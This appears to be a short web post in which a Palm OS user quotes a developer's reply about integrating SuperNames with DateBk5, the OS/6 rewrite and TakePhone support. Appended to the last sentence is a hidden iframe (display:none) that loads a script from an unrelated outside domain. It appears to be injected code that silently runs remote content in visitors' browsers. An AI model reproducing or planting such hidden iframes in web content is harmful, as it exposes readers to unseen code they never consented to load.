I recently e-mailed the developers of SuperNames and DateBk5.1a about integrating their products to make a better competitor to the latest version of Agendus. Here is the response from Pimlico (my comments are proceeded by the ">").

> However, as an address manager SuperNames surpasses anything else on
> the market and as a time manager DateBk5.1a is the best. I am
> wondering if it is possible to for Pimlico and Stand Alone Software to
> share their code and/or APIs to create
> a product that can do everything Agendus can do and more.

Well, it's not something that is likely to happen. Sharing source code is not feasible and integrating some other third party application into DateBk5 split-screen view is just not practical with the serious limitations of the Palm OS. Under a sophisticated OS like windows, it would be feasible (COM is very neat that way). There is nothing like that in the Palm OS.

Since OS/6 is right around the corner and since the current DateBk5 (and all other third party apps that talk to the PIM databases like Supernames, Agendus etc.) will not run on OS/6 with the new PIM databases, a major rewrite will be necessary and it makes sense to do these things at the same time.

I haven't used Supernames myself, but I understand it's a very popular app among DateBk5 users. It might be that the two of us can do some fairly simple things that would improve the level of integration....

> And as a final note, make certain it integrates well with TakePhone
> (www.shsh.com). Although only smartphone owners may find the product
> useful, TakePhone is THE reason to be a smartphone instead of a stand
> alone Palm.

I will be supporting Take Phone in the next maintenance release.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>